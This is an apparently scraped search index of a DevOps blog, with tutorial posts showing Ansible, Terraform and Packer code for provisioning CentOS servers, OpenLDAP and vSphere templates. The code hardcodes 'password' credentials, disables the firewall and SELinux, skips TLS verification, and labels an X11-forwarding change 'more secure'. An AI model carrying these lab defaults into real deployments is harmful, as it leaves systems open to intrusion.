with Terraform .\nNow we want to install some more packages on our new servers.\ntl;dr I started using Ansible for deployments some years ago. For example I showed deploying IBM Connections at Social Connections 12 in Vienna .\nFor more details on the functionality, have a look at the post How Ansible Works Ansible uses plain ssh and doesn’t need any additional server or client component.\nYou can run Ansible as a separate task in your deployment pipeline, or add it as post-provisioning task to Terraform. So it runs automatically when Terraform deploys your systems.\nWindows You can use Ansible to deploy Windows Servers too. More interesting is running Ansible from a Windows machine to deploy Linux and Windows servers.\nFor Windows you can use WinRM or SSH to connect for remote management. The SSH support is experimental AFAIK.\nAnsible Installation Ansible is available for all major Linux distributions. Check the documentation for installation instructions .\nLittle project Directory structure of a little Ansible example\n. ├── group_vars │ └── all │ └── main.yml ├── inventory ├── roles │ ├── common │ │ └── tasks │ │ └── main.yml │ └── ldap │ ├── defaults │ │ └── main.yml │ └── tasks │ └── main.yml ├── site.yml └── templates ├── base.ldif.j2 ├── db.ldif.j2 ├── ldap-config.sh.j2 ├── monitor.ldif.j2 └── user-ldap.ldif.j2 In the inventory file you define your servers and group them together.\ninventory\n[gpn19] gpn19-server1 gpn19-server2 [ldap] gpn19-server2 So gpn19-server1 is only in the group gpn19, server gnp19-server2 is part of gpn19 and ldap. There is always a group all with all servers of an inventory file.\nThe Ansible playbook itself is defined as an Yaml-file:\nsite.yml\n--- - hosts: all roles: - common - hosts: ldap roles: - role: ldap So for all hosts the role common will run and on group ldap the role ldap.\nTo make the roles independent of the environment, we use some variables. So it’s enough to just change the variable and the deployment will use different domain and passwords.\ngroup_vars/all/task.yml\n--- ldap: domain: dc=devops,dc=example,dc=com passwordencrypted: \u0026#34;{SSHA}CdGAzVNlrqgLbKo6pebBxuDBBkxokkHm\u0026#34; passwordclear: \u0026#34;password\u0026#34; To keep it simple, the password is defined here in the variable file. Have a look at Ansible Vault to keep your passwords encrypted.\nUsing template files For the ldap deployment we need to change some files on the target server. These are already prepared in the directory templates and use Jinga2 template engine .\ntemplates/ldapconfig.sh.j2\n#!/usr/bin/env bash cd /etc/openldap/slapd.d ldapmodify -Y EXTERNAL -H ldapi:/// -f db.ldif ldapmodify -Y EXTERNAL -H ldapi:/// -f monitor.ldif sleep 5 ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif sleep 5 ldapadd -x -w {{ ldap.passwordclear }} -D \u0026#34;cn=ldapadm,{{ ldap.domain }}\u0026#34; -f /etc/openldap/slapd.d/base.ldif sleep 10 ldapadd -x -w {{ ldap.passwordclear }} -D \u0026#34;cn=ldapadm,{{ ldap.domain }}\u0026#34; -f /etc/openldap/slapd.d/user-ldap.ldif We can use our variable in Jinga2 and these will be replaced during deployment roles/common/tasks/main.yml\n--- # Disable Firewall during Installation - name: Disable Firewall service: name=firewalld state=stopped enabled=no # Disabe SELinux, most IBM Software is not supported with it - name: Disable SELinux selinux: state: disabled # Increase limits.conf for IBM products - name: Change limits.conf pam_limits: domain: root limit_type: \u0026#39;-\u0026#39; limit_item: nproc value: \u0026#39;16384\u0026#39; - pam_limits: domain: root limit_type: \u0026#39;-\u0026#39; limit_item: nofile value: \u0026#39;65536\u0026#39; - pam_limits: domain: root limit_type: \u0026#39;-\u0026#39; limit_item: stack value: \u0026#39;10240\u0026#39; # Install Unzip - name: Install unzip to support unarchive function of ansible, add xauth package: name={{ item }} state=latest with_items: - unzip - xauth - vim # Configure SSH X11Forward - name: Update SSH configuration to be more secure. lineinfile: dest: \u0026#34;/etc/ssh/sshd_config\u0026#34; regexp: \u0026#34;{{ item.regexp }}\u0026#34; line: \u0026#34;{{ item.line }}\u0026#34; state: present with_items: - regexp: \u0026#34;^X11Forwarding\u0026#34; line: \u0026#34;X11Forwarding yes\u0026#34; - regexp: \u0026#34;^X11UseLocalhost\u0026#34; line: \u0026#34;X11UseLocalhost no\u0026#34; - name: Restart SSH service: name=sshd state=restarted enabled=yes Stop Firewalld and set to disabled\nConfigure some limits in limits.conf\nInstall additional packages (independent of yum or apt)\nroles/ldap/tasks/main.yml\n--- - name: Install system packages for OpenLDAP package: name={{ item }} state=latest with_items: - openldap-servers - openldap-clients - name: Enable Slapd service service: name=slapd state=restarted enabled=yes - name: Initial ldap config, copy templates db.ldif template: src=db.ldif.j2 dest=/etc/openldap/slapd.d/db.ldif tags: parse - name: Initial ldap config, copy templates monitor.ldif template: src=monitor.ldif.j2 dest=/etc/openldap/slapd.d/monitor.ldif tags: parse - name: Create base.ldif template: src=base.ldif.j2 dest=/etc/openldap/slapd.d/base.ldif tags: parse - name: Create user.ldif template: src=user-ldap.ldif.j2 dest=/etc/openldap/slapd.d/user-ldap.ldif tags: parse - name: Copy sample db config copy: src: \u0026#34;/usr/share/openldap-servers/DB_CONFIG.example\u0026#34; dest: \u0026#34;/var/lib/ldap/DB_CONFIG\u0026#34; remote_src: yes directory_mode: yes owner: ldap group: ldap - name: Create LDAP Config Script template: src: ldap-config.sh.j2 dest: /tmp/ldap-config.sh mode: 0755 tags: parse - name: Configure LDAP and Import Users shell: \u0026#34;/tmp/ldap-config.sh\u0026#34; - name: Remove config script file: path: /tmp/ldap-config.sh state: absent Enable slapd service\nCopy db.ldif.j2 from templates to dest\nRun Ansible Playbook To run this playbook with our inventory file, just run:\nansible-playbook -i inventory site.yml So now you’re prepared to build new servers and deploy software on it. Have fun!\nAnsible Galaxy On Ansible Galaxy you can share and download Ansible roles. So start new projects searching there, don’t start from scratch.\nGalaxy is a hub for finding and sharing Ansible content.\nUse Galaxy to jump-start your automation project with great content from the Ansible community. Galaxy provides pre-packaged units of work known to Ansible as Roles, and new in Galaxy 3.2, Collections.\nRoles can be dropped into Ansible PlayBooks and immediately put to work. You’ll find roles for provisioning infrastructure, deploying applications, and all of the tasks you do everyday. The new Collection format provides a comprehensive package of automation that may include multiple playbooks, roles, modules, and plugins.\nGulasch Programmiernacht The content of this series was part of my talk at the GPN19. So you can watch a video of the talk too:\n\u0026lt;iframe width=\u0026ldquo;1024\u0026rdquo; height=\u0026ldquo;576\u0026rdquo; src=\u0026ldquo;https://media.ccc.de/v/gpn19-111-automate-your-virtual-server-deployments/oembed\" frameborder=\u0026ldquo;0\u0026rdquo; allowfullscreen\u0026gt;\u0026lt;/iframe\u0026gt; ","excerpt":"\u003cp\u003eIn the first two parts of this little devops series, I showed \u003ca href=\"https://stoeps.de/2019/06/02/20190602-packer-template-vsphere/\" target=\"_blank\"\u003ebuild templates with Packer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://stoeps.de/2019/06/05/20190605-terraform-vsphere/\" target=\"_blank\"\u003edeploying virtual-machines with Terraform \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eNow we want to install some more packages on our new servers.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190609-ansible-provisioning/","title":"Ansible Provisioning"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vsphere/","title":"Vsphere"},{"body":"My last article showed how to build a server template with Packer .\nNow we want to use this template to create some servers on VMware vSphere. DNS will be registered manually and all IP addresses will be defined as fixed in the config files.\nThis code is tested with Terraform 0.12.\ntl;dr Terraform provides a good way to implement immutable server life cycle. Immutable means that servers aren’t changed, they get destroyed/deleted and created again when you change something.\nImmutable servers have a big advantage that configuration drift will not take place. I like the fact that you can trust that servers act equally when you use the same configuration over and over again.\nSo we can deploy test and production, deploy patches and still be sure that tests can be trusted.\nWith mutable deployments, it can happen, that servers act differently. Like deploying fix1, fix2 and fix3 on a test server, but in production, you deploy just fix3 (which is cumulative and have all fixes included from 1-2). Normally the servers should act equally, but often we see differences during production deployments.\nI think the time of manually deployed systems is over. The amount of time for installing, documenting and patching is just too high.\nMost of the time we have fear running automated tasks on our servers because we’re unsure that there were changes applied, which are not covered in our scripts. You need to see the advantages:\nDocumentation automated (most of the time our definition files are documentation enough)\nReliable server deployments\nAutomated tests can help to deploy patches and updates to all and not only a few systems\nData should be stored on separate disks or storage systems, then it is independent of your servers.\nOften containerization is shown as the solution for immutable deployments. That’s right and I love working with them, but how do you deploy servers running Kubernetes or Docker? I prefer generating virtual machines (automated) instead of using very large containers. So when I can’t limit a container to a single micro service, I create a virtual machine most of the time.\nTerraform installation Just download the zipped binary from https://www.terraform.io/downloads.html and put it into your PATH.\nDownload needed plugins The binary checks all files in your current folder and then download the needed plugins for your deployment.\nJust run\nterraform init Build the first server with Terraform build.tf\nprovider \u0026#34;vsphere\u0026#34; { user : var.vsphere_user password : var.vsphere_password vsphere_server : var.vsphere_server allow_unverified_ssl: true } variable \u0026#34;project_folder\u0026#34; { default: \u0026#34;stoeps-example\u0026#34; } data \u0026#34;vsphere_datacenter\u0026#34; \u0026#34;dc\u0026#34; { name = var.vsphere_datacenter } data \u0026#34;vsphere_datastore\u0026#34; \u0026#34;datastore\u0026#34; { name = var.vsphere_datastore datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_compute_cluster\u0026#34; \u0026#34;cluster\u0026#34; { name = var.vsphere_cluster datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_resource_pool\u0026#34; \u0026#34;pool\u0026#34; { name = var.vsphere_resource_pool datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_network\u0026#34; \u0026#34;network\u0026#34; { name = var.vsphere_network datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_virtual_machine\u0026#34; \u0026#34;template\u0026#34; { # Name of Template name = var.template datacenter_id = data.vsphere_datacenter.dc.id } resource \u0026#34;vsphere_folder\u0026#34; \u0026#34;folder\u0026#34; { path = \u0026#34;${var.my_devops_folder}/${var.project_folder}\u0026#34; type = \u0026#34;vm\u0026#34; datacenter_id = data.vsphere_datacenter.dc.id } vars.tf\nvariable \u0026#34;vsphere_server\u0026#34; { default: \u0026#34;khnum.example.com\u0026#34; } variable \u0026#34;vsphere_user\u0026#34; { default: \u0026#34;cstoettner@example.com\u0026#34; } variable \u0026#34;vsphere_password\u0026#34; { description: \u0026#34;vsphere server password for the environment\u0026#34; default : \u0026#34;\u0026#34; } variable \u0026#34;vsphere_datacenter\u0026#34; { default: \u0026#34;HVIE\u0026#34; } variable \u0026#34;vsphere_cluster\u0026#34; { default = \u0026#34;HVIE PWR HOSTS\u0026#34; } variable \u0026#34;vsphere_datastore\u0026#34; { default = \u0026#34;devops-01_sas_7.2k_raid10\u0026#34; } variable \u0026#34;vsphere_network\u0026#34; { default = \u0026#34;vm-net-devops\u0026#34; } variable \u0026#34;vsphere_resource_pool\u0026#34; { default = \u0026#34;rp_hvie_devops\u0026#34; } variable \u0026#34;my_devops_folder\u0026#34; { default = \u0026#34;devops\u0026#34; } variable \u0026#34;vsphere_domain\u0026#34; { default = \u0026#34;devops.example.com\u0026#34; } variable \u0026#34;vsphere_dns_servers\u0026#34; { type = list(string) default = [\u0026#34;10.10.85.5\u0026#34;] } variable \u0026#34;admin_user\u0026#34; { default = \u0026#34;root\u0026#34; } variable \u0026#34;admin_password\u0026#34; { default = \u0026#34;password\u0026#34; } variable \u0026#34;template\u0026#34; { default = \u0026#34;centos-76-base\u0026#34; } variable \u0026#34;ssh-pub-key\u0026#34; { # Do not store with your code in git, provide on the commandline! default = \u0026#34;\u0026#34; } User for first SSH login\nPassword for SSH\nDuring provisioning, I run some shell commands to disable the password login for root and putting an SSH Key into /root/.ssh/authorized_keys.\nserver1.tf\nresource \u0026#34;vsphere_virtual_machine\u0026#34; \u0026#34;example-server1\u0026#34; { name : \u0026#34;example-server1\u0026#34; resource_pool_id: data.vsphere_resource_pool.pool.id datastore_id : data.vsphere_datastore.datastore.id num_cpus : 4 memory : 4096 guest_id = data.vsphere_virtual_machine.template.guest_id scsi_type = data.vsphere_virtual_machine.template.scsi_type network_interface { network_id = data.vsphere_network.network.id adapter_type = data.vsphere_virtual_machine.template.network_interface_types[0] } folder = \u0026#34;${var.my_devops_folder}/${var.project_folder}\u0026#34; disk { label = \u0026#34;disk0\u0026#34; size = 100 eagerly_scrub = \u0026#34;false\u0026#34; thin_provisioned = \u0026#34;true\u0026#34; } clone { template_uuid = data.vsphere_virtual_machine.template.id customize { linux_options { host_name = \u0026#34;example-server1\u0026#34; domain = var.vsphere_domain } network_interface { ipv4_address = \u0026#34;10.10.85.95\u0026#34; ipv4_netmask = 24 } ipv4_gateway = \u0026#34;10.10.85.1\u0026#34; dns_server_list = var.vsphere_dns_servers dns_suffix_list = [var.vsphere_domain] } } provisioner \u0026#34;remote-exec\u0026#34; { inline = [ \u0026#34;systemd-machine-id-setup\u0026#34;, \u0026#34;mkdir /root/.ssh\u0026#34;, \u0026#34;touch /root/.ssh/authorized_keys\u0026#34;, \u0026#34;echo ${var.ssh-pub-key} \u0026gt;\u0026gt; /root/.ssh/authorized_keys\u0026#34;, \u0026#34;chown root:root -R /root/.ssh\u0026#34;, \u0026#34;chmod 700 /root/.ssh\u0026#34;, \u0026#34;chmod 600 /root/.ssh/authorized_keys\u0026#34;, \u0026#34;passwd --lock root\u0026#34; ] } connection { host = \u0026#34;${self.default_ip_address}\u0026#34; type = \u0026#34;ssh\u0026#34; user = \u0026#34;root\u0026#34; password = \u0026#34;${var.admin_password}\u0026#34; } } Lock user root, so only key authentication is possible When you want to create multiple servers, you can just duplicate the definition file of server1 and change name and IP addresses, or you use loops and counters.\nNow let’s build the first deployment plan:\nterraform plan -var \u0026#34;vsphere_password=my-funky-password\u0026#34; \\ -var \u0026#34;template=stoeps-centos-20190604\u0026#34; \\ -var \u0026#34;ssh-pub-key=$(cat ~/.ssh/stoeps_rsa.pub)\u0026#34; \\ -out server1.terraform set your password for vSphere here\ntemplate name which should be used for provisioning\ncat the ssh public key to the variable ssh-pub-key\nwrite a deployment file\nProviding the password and key on the command line has a big advantage because then your password isn’t stored in your version control system. On the other side, it will appear in shell history. Bash doesn’t store commands starting with a space into the history, or you set a temporary environment variable to store the password there. The SSH Key will be read from the public key file directly.\nTerraform will show you all resources and information which will be created, changed or destroyed. Don’t forget that Terraform will work with all files of the current folder.\nChanging a variable can trigger a recreation of the whole environment of the current folder, so check carefully what will happen on applying.\nApply the change\nterraform apply server1.terraform Recreate a single server Sometimes destroying or changing all servers is too much. With Terraform you have the option to taint a server, a tainted server will be deleted and created again on the next terraform plan and terraform apply.\nMark server for recreation (taint)\nterraform taint vsphere_virtual_machine.example-server2 The complete name is needed here Destroy servers When you want to delete all servers, you can run\nDestroy servers\nterraform destroy -var \u0026#34;vsphere_password=`echo $TF`\u0026#34; -var \u0026#34;template=stoeps-centos-20190604\u0026#34; -var \u0026#34;ssh-pub-key=$(cat ~/.ssh/stoeps_rsa.pub)\u0026#34; Next Ansible Next step will be further provisioning with Ansible . This can run separately, or as a post-provisioning task from Terraform.\n","excerpt":"\u003cp\u003eMy last \u003ca href=\"/2019/06/02/20190602-packer-template-vsphere/\"\u003earticle\u003c/a\u003e\n showed how to build a server template with \u003ca href=\"https://packer.io\" target=\"_blank\"\u003ePacker \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eNow we want to use this template to create some servers on VMware vSphere.\nDNS will be registered manually and all IP addresses will be defined as fixed in the config files.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190605-terraform-vsphere/","title":"Provision servers with Terraform on vSphere"},{"body":"The last months I built a lot of environments for tests with IBM Connections Componentpack, Rancher, plain Kubernetes, IBM Domino and some more. In former years, I deployed single virtual machines, cloned them and created snapshots to \u0026ldquo;easily\u0026rdquo; jump back in cases of errors. Then I found Packer , which helped me to automate the first virtual machines on my local notebook.\nNow I use Packer to create templates for VMware vSphere, which then are deployed and multiplied with Terraform . Terraform needs some packages installed in the template, that it can provision virtual machines on vSphere.\nOpen VM-Tools\nPerl\nYou can find all files and scripts on Gitlab.\nThe definition is simplified to make it better readable. As best practise I would recommend to add a variabe section to the packer file, so you avoid to type the same information over and over again.\nIn this article I just prepare the template. Working with Terraform will be covered in a future post.\nOne thing more, to install additional software on the provisioned servers later, I will use Ansible . Ansible needs ssh and Python .\nFirst CentOS template To create a template for CentOS, we start with a kickstart file, which is used by Packer to install and configure the template.\nCreate a root password\necho \u0026#39;import crypt,getpass; \\ print crypt.crypt(getpass.getpass(), \u0026#34;$5$16_CHARACTER_SALT_HERE\u0026#34;)\u0026#39; | python - Replace $16_CHARACTER_SALT_HERE with 16 random characters.\nExample to generate 16 random characters\nopenssl rand -base64 24 | cut -c-16 Kickstart File You can find one in my GPN19 repo at Gitlab.com .\nSimple kickstart file\ninstall lang en_US.UTF-8 keyboard de timezone Europe/Berlin auth --useshadow --enablemd5 services --enabled=NetworkManager,sshd eula --agreed ignoredisk --only-use=sda reboot bootloader --location=mbr zerombr clearpart --all --initlabel part swap --asprimary --fstype=\u0026#34;swap\u0026#34; --size=1024 part /boot --fstype xfs --size=200 part pv.01 --size=1 --grow volgroup rootvg01 pv.01 logvol / --fstype xfs --name=lv01 --vgname=rootvg01 --size=1 --grow authconfig --enableshadow --passalgo=sha256 rootpw --iscrypted $5$cnxfyyiayqjelmbt$4/Lq1vPDBp2BZznXcLukwVy4n0DPp6tX.PrCz7YA62B %packages --nobase --ignoremissing @core %end Packer JSON To tell Packer how our template should be installed, start with following file :\n{ \u0026#34;builders\u0026#34;: [ { \u0026#34;type\u0026#34;: \u0026#34;vmware-iso\u0026#34;, \u0026#34;boot_command\u0026#34;: [ \u0026#34;\u0026lt;tab\u0026gt; text ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/kickstart-de.cfg\u0026lt;enter\u0026gt;\u0026#34; ], \u0026#34;communicator\u0026#34;: \u0026#34;ssh\u0026#34;, \u0026#34;guest_os_type\u0026#34;: \u0026#34;centos7-64\u0026#34;, \u0026#34;http_directory\u0026#34;: \u0026#34;http\u0026#34;, \u0026#34;iso_checksum_type\u0026#34;: \u0026#34;sha256\u0026#34;, \u0026#34;iso_checksum_url\u0026#34;: \u0026#34;http://ftp.halifax.rwth-aachen.de/centos/7.6.1810/isos/x86_64/sha256sum.txt\u0026#34;, \u0026#34;iso_url\u0026#34;: \u0026#34;http://ftp.halifax.rwth-aachen.de/centos/7.6.1810/isos/x86_64/CentOS-7-x86_64-Minimal-1810.iso\u0026#34;, \u0026#34;ssh_username\u0026#34;:\u0026#34;root\u0026#34;, \u0026#34;ssh_password\u0026#34;:\u0026#34;password\u0026#34;, \u0026#34;ssh_wait_timeout\u0026#34;: \u0026#34;600s\u0026#34;, \u0026#34;shutdown_command\u0026#34;: \u0026#34;shutdown -P now\u0026#34;, \u0026#34;version\u0026#34;: 14 } ], \u0026#34;provisioners\u0026#34;: [ { \u0026#34;type\u0026#34;: \u0026#34;shell\u0026#34;, \u0026#34;expect_disconnect\u0026#34;: true, \u0026#34;execute_command\u0026#34;: \u0026#34;sudo UPDATE=true bash \u0026#39;{{ .Path }}\u0026#39;\u0026#34;, \u0026#34;environment_vars\u0026#34;: [ \u0026#34;UPDATE=true\u0026#34; ], \u0026#34;scripts\u0026#34;: [ \u0026#34;script/epel.sh\u0026#34;, \u0026#34;script/kernel.sh\u0026#34;, \u0026#34;script/sshd.sh\u0026#34;, \u0026#34;script/vmtools.sh\u0026#34;, \u0026#34;script/update.sh\u0026#34;, \u0026#34;script/reboot.sh\u0026#34;, \u0026#34;script/ansible.sh\u0026#34;, \u0026#34;script/cleanup.sh\u0026#34; ] } ], \u0026#34;post-processors\u0026#34;: [ [ { \u0026#34;type\u0026#34;: \u0026#34;vsphere\u0026#34;, \u0026#34;cluster\u0026#34;: \u0026#34;HMUC PWR HOSTS\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;vsphere.example.com\u0026#34;, \u0026#34;datacenter\u0026#34;: \u0026#34;HMUC\u0026#34;, \u0026#34;resource_pool\u0026#34;: \u0026#34;rp_hvie_devops\u0026#34;, \u0026#34;username\u0026#34;: \u0026#34;cstoettner@example.com\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;{{user `vsphere_password`}}\u0026#34;, \u0026#34;datastore\u0026#34;: \u0026#34;devops-01_sas_7.2k_raid10\u0026#34;, \u0026#34;vm_name\u0026#34;: \u0026#34;stoeps-centos-gpn19\u0026#34;, \u0026#34;vm_folder\u0026#34;: \u0026#34;devops\u0026#34;, \u0026#34;vm_network\u0026#34;: \u0026#34;vm-net-devops\u0026#34;, \u0026#34;disk_mode\u0026#34;: \u0026#34;thin\u0026#34;, \u0026#34;insecure\u0026#34;: \u0026#34;true\u0026#34;, \u0026#34;overwrite\u0026#34;: \u0026#34;true\u0026#34; }, { \u0026#34;type\u0026#34;: \u0026#34;vsphere-template\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;vsphere.example.com\u0026#34;, \u0026#34;insecure\u0026#34;: \u0026#34;true\u0026#34;, \u0026#34;datacenter\u0026#34;: \u0026#34;HMUC\u0026#34;, \u0026#34;username\u0026#34;: \u0026#34;cstoettner@example.com\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;{{user `vsphere_password`}}\u0026#34;, \u0026#34;folder\u0026#34;: \u0026#34;/devops/templates\u0026#34; } ] ] } Builder (building the vmware itself)\nProvisioner (run some scripts on the new deployed machine)\nPost-Processor (upload to VMware vSphere)\nThe order is important, or Terraform can’t recognize the vm tools\nPost-Processor to upload the VM to vSphere\nPost-Processor to tag it as template\nI set the root password to password in the kickstart\nThe kickstart file generates the user root with password password. During the deployment with Terraform I disable the password login with passwd -l root, so the root user needs to use a ssh-key for authentication.\nThanks to Nico for the tip with passwd --lock.\nThis configuration file uses a lot of default values from VMware, like disk space, cpu count and so on. All these can be changed later during our Terraform deployment.\nWithin the Provisioner part, I use some scripts, to add:\nEPEL repository\nInstall open-vm-tools, perl, python\nUpdate all installed packages\nUpdate the kernel to the latest version (in the moment 5.1)\nThe original CentOS kernel is quite old and the Docker support needs some tweaks like the usage of device-mapper, that’s the main reason for the update Reboot (important to do this after the open-vm-tools installation, because without Terraform will not recognize the tools and not deploy)\nCleanup (deleting host keys, repositories and so on)\nDuring my talk at GPN19, someone pointed me to Systemd machine id . I always ignored this, but I added the delete command to the cleanup script and the create command into my Terraform file. Thanks for this hint!\nCreate the template packer build -var vsphere_password=My_Vsphere_password centos.json I use a variable for the password, because I always check-in my definition files to git and I don’t want to have passwords there in the history.\nI created a video of the creation, please try the command yourself, or have a look at it.\nNow our template is uploaded to vSphere. Using it within Terraform will be another post.\n","excerpt":"\u003cp\u003eThe last months I built a lot of environments for tests with IBM Connections Componentpack, Rancher, plain Kubernetes, IBM Domino and some more.\nIn former years, I deployed single virtual machines, cloned them and created snapshots to \u0026ldquo;easily\u0026rdquo; jump back in cases of errors.\nThen I found \u003ca href=\"https://packer.io\" target=\"_blank\"\u003ePacker \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which helped me to automate the first virtual machines on my local notebook.\u003c/p\u003e\n\u003cp\u003eNow I use Packer to create templates for VMware vSphere, which then are deployed and multiplied with \u003ca href=\"https://terraform.io\" target=\"_blank\"\u003eTerraform \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nTerraform needs some packages installed in the template, that it can provision virtual machines on vSphere.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190602-packer-template-vsphere/","title":"Create vSphere Template with Packer"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/packer/","title":"Packer"},{"body":":icons: font\nSince thursday the gpn19 (Gulasch Programmiernacht) is taking place in Karlsruhe at ZKM. I’m happy that I got the chance to give two talks:\nDocumentation with any editor Automate your Infrastructure Deployment All sessions of GPN will be recorded and are available at https://media.ccc.de/b/conferences/gpn/gpn19 . There was a technical problem during my first talk, so the recording can’t be found there. Sorry for that.\nAll code snippets I showed during that talks can be found here:\nhttps://gitlab.com/stoeps/gpn19-documentation https://gitlab.com/stoeps/gpn19-iac If you’re around, or living in that area, join us there. It’s well organized and free to attend! The organizers are asking for a donation when you’re attending.\nMore informations can be found in the FAQ .\nAgenda ","excerpt":"\u003cp\u003e:icons: font\u003c/p\u003e\n\u003cp\u003eSince thursday the \u003ca href=\"https://entropia.de/GPN19\" target=\"_blank\"\u003egpn19 (Gulasch Programmiernacht) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is taking place in Karlsruhe at ZKM.\nI’m happy that I got the chance to give two talks:\u003c/p\u003e\n\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \n \u003c/a\u003e\n\u003c/span\u003e\n\n\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-AutomateYourInfrastructure.html\" target=\"_blank\"\u003eAutomate your Infrastructure Deployment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \n \u003c/a\u003e\n\u003c/span\u003e","ref":"https://stoeps.de/posts/2019/20190601-gpn19/","title":"Gulasch Programmiernacht 2019 - #gpn19"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/iac/","title":"IAC"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/infrastructure-as-code/","title":"Infrastructure as Code"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/speaking/","title":"Speaking"},{"body":"Admincamp Docker was ist das eigentlich? IBM Connections administrieren Gulasch Programmiernacht 2019 Documentation with any editor Automate your Infrastructure Deployment Automate your Infrastructure Deployment Froscon 14 Documentation with any editor Documentation with any editor Social Connections 15 How being a Connections administrator gave me gray hairs ","excerpt":"\u003ch2 id=\"admincamp\"\u003eAdmincamp \u003ca href=\"#admincamp\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC19-T2S1-DockerWasIstDasEigentlich.html\" target=\"_blank\"\u003eDocker was ist das eigentlich? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC19-T2S2-IBMConnectionsAdministrieren.html\" target=\"_blank\"\u003eIBM Connections administrieren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"gulasch-programmiernacht-2019\"\u003eGulasch Programmiernacht 2019 \u003ca href=\"#gulasch-programmiernacht-2019\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-AutomateYourInfrastructure.html\" target=\"_blank\"\u003eAutomate your Infrastructure Deployment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://media.ccc.de/v/gpn19-111-automate-your-virtual-server-deployments\" target=\"_blank\"\u003eAutomate your Infrastructure Deployment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \n \u003ci class=\"las la-video la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"froscon-14\"\u003eFroscon 14 \u003ca href=\"#froscon-14\"\u003e\u003ci class=\"las la-link 